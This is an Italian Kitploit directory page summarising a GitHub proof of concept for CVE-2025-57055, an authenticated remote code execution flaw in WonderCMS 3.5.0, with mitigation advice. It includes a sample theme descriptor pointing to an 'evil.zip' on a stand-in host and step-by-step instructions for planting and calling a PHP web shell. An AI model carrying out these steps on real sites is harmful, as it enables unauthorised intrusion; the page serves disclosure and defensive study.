Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-57055 — Exploit RCE autenticato per WonderCMS 3.5.0 tramite installazione di temi dannosi. Include meccanismi di vulnerabilità, PoC e indicazioni di mitigazione per test di sicurezza e formazione. | Kitploit
Strumenti/GitHubGitHub/thawphone/cve-2025-57055
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubthawphone/cve-2025-57055

CVE-2025-57055

Exploit RCE autenticato per WonderCMS 3.5.0 tramite installazione di temi dannosi. Include meccanismi di vulnerabilità, PoC e indicazioni di mitigazione per test di sicurezza e formazione.

Vedi Repository
0 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-57055: Esecuzione remota di codice autenticata in WonderCMS 3.5.0

Meccanismo della vulnerabilità

Esiste una vulnerabilità di esecuzione remota di codice (RCE) autenticata in WonderCMS v3.5.0.

Il problema deriva da come l'applicazione gestisce installazioni remote di temi/moduli tramite descrittori JSON. Quando un amministratore invia un file JSON remoto che fa riferimento a un archivio ZIP, il suo contenuto viene estratto in una directory accessibile via web (ad esempio /themes/). Se lo ZIP contiene un file PHP, tale file diventa accessibile sul web e può essere eseguito.

Questo comportamento introduce un rischio di RCE a causa di:

  • Assenza di validazione o sanitizzazione dei contenuti ZIP.
  • Nessuna restrizione sui tipi di file estratti da fonti remote.
  • Accessibilità web delle directory di temi/plugin.

Nota: È richiesta l'autenticazione dell'amministratore, ma le installazioni predefinite espongono pubblicamente la password dell'amministratore (nella home page), utilizzano solo la password per il login e non applicano controlli di autenticazione forti.

Criteri di accettazione per descrittori di moduli/temi remoti

WonderCMS accetta e tenta di installare moduli/temi remoti se il descrittore JSON inviato corrisponde al formato previsto wcms-modules.json. Un descrittore che supera il controllo del formato (e punta a un archivio ZIP) viene recuperato e il suo contenuto estratto in una directory accessibile via web (ad esempio ) senza ulteriori validazioni dei tipi di file.

/themes/<name>/

Descrittore di esempio:

root@kitploit:~
{
  "themes": {
    "SSRF": {
      "name": "FAKE",
      "repo": "https://example.com/",
      "zip": "https://example.com/evil.zip",
      "summary": "test",
      "version": "1.0.0",
      "image": "https://example.com/fake.png"
    }
  }
}

Prova di concetto (PoC)

Avvertenza: non eseguire su sistemi di produzione. Utilizzare solo ambienti di test autorizzati.

  1. Ottenere la password dell'amministratore dalla home page pubblicamente esposta di un'installazione WonderCMS predefinita.

  2. Accedere al pannello di amministrazione.

  3. Navigare alla sezione di installazione dei temi.

  4. Fornire l'URL di un descrittore JSON dannoso (ad esempio, ospitato su un server controllato dall'attaccante).

  5. Avviare l'installazione. Il server:

  • Recupera il descrittore.
  • Scarica l'archivio ZIP specificato.
  1. Installare il tema dannoso scaricato.

  2. Accedere alla shell PHP estratta (ad esempio, http://target.com/themes/<Theme_Name>/shell.php) per eseguire comandi arbitrari.

(Nota: eseguire questi passaggi solo in un ambiente di test controllato. Sfruttare questa vulnerabilità su sistemi in produzione senza autorizzazione è illegale.)

Risposta del vendor

  • La vulnerabilità è stata segnalata ai manutentori di WonderCMS a luglio 2025.

  • I manutentori hanno riconosciuto il report ma hanno osservato che, a loro avviso, questo comportamento è accettabile per gli amministratori.

Linee guida per la mitigazione

Per ridurre l'esposizione:

  • Limitare le capacità di installazione remota a fonti attendibili (ad esempio, solo GitHub).
  • Validare e sanitizzare i contenuti ZIP prima dell'estrazione.
  • Rafforzare l'autenticazione:
    • Nascondere la password dell'amministratore dopo l'installazione.
    • Imporre login con nome utente/password.
    • Abilitare l'autenticazione multi-fattore (se disponibile).
  • Impedire l'accesso ai file eseguibili all'interno di themes/ o plugins/ tramite la configurazione del server.

Riferimenti

  • WonderCMS GitHub
  • OWASP A05:2021 – Configurazione di sicurezza errata
  • CWE-434 – Caricamento senza restrizioni di un file con tipo pericoloso

Dichiarazione di non responsabilità

Queste informazioni sono fornite a scopo di ricerca difensiva sulla sicurezza e scopi educativi. Ottenere sempre la dovuta autorizzazione prima di testare o divulgare vulnerabilità.

Scarica lo strumento